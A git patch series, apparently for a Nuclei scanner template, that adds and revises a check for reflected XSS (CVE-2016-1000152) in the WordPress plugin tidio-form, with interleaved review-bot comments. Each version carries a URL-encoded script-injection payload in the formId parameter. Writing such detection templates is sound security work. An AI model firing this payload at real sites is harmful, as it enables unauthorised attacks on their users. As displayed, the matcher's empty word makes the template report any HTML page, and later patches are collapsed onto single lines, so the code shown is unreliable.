From fa127ec3514d0f4536f3c890e1f1923d2545fb82 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Thu, 22 Jul 2021 05:57:54 +0700
Subject: [PATCH 1/3] Create CVE-2016-1000152.yaml
---
cves/2016/CVE-2016-1000152.yaml | 29 +++++++++++++++++++++++++++++
1 file changed, 29 insertions(+)
create mode 100644 cves/2016/CVE-2016-1000152.yaml
diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml
new file mode 100644
index 0000000000..0c8455b1b7
--- /dev/null
+++ b/cves/2016/CVE-2016-1000152.yaml
@@ -0,0 +1,29 @@
+id: CVE-2016-1000152
+
+info:
+ name: Easy Contact Form Builder <= 1.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
From 4c83f2341b5f761dd9a138d735219c2037a53c77 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Thu, 22 Jul 2021 17:53:22 +0530
Subject: [PATCH 2/3] Update CVE-2016-1000152.yaml
---
cves/2016/CVE-2016-1000152.yaml | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml
index 0c8455b1b7..7c3165b3f0 100644
--- a/cves/2016/CVE-2016-1000152.yaml
+++ b/cves/2016/CVE-2016-1000152.yaml
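Review bot: The body matcher in [PATCH 1/3] has an empty string as its only word (`- ""` under `words:`) as shown on this page, and an empty string is contained in every response body. As displayed, the template would therefore report any host that answers the request with status 200 and a `text/html` header, whether or not the plugin reflects the input. The original value may have been lost when the page was rendered; if so, confirm that the word is the decoded markup exactly as sent in `formId`, so that an HTML-encoded reflection from a fixed or filtered install does not match. The replacement matcher line in [PATCH 2/3] displays the same way and needs the same check.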
@@ -4,19 +4,20 @@ info: name: Easy Contact Form Builder <= 1.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin tidio-form v1.0 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 07ee00e38d1de3e7cc5ee33ad9d518d3b6411dfb Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 22 Jul 2021 19:34:36 +0700 Subject: [PATCH 3/3] Update CVE-2016-1000152.yaml --- cves/2016/CVE-2016-1000152.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml index 7c3165b3f0..2dd82e5904 100644 --- a/cves/2016/CVE-2016-1000152.yaml +++ b/cves/2016/CVE-2016-1000152.yaml @@ -1,7 +1,7 @@ id: CVE-2016-1000152 info: - name: Easy Contact Form Builder <= 1.0 - Reflected Cross-Site Scripting (XSS) + name: Tidio-form <= 1.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium description: Reflected XSS in wordpress plugin tidio-form v1.0
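Review bot: The `description` added in [PATCH 2/3] restates the title and does not say where the injection occurs, which is the detail someone triaging a hit needs. The request path in the same hunk shows it is the `formId` query parameter of `popup-insert-help.php`, so the line could read `description: Reflected XSS in the WordPress plugin tidio-form v1.0 through the formId parameter of popup-insert-help.php.` It would also help to note that the only fix information visible here is the version bound in `name`, since the single `reference` is the NVD entry.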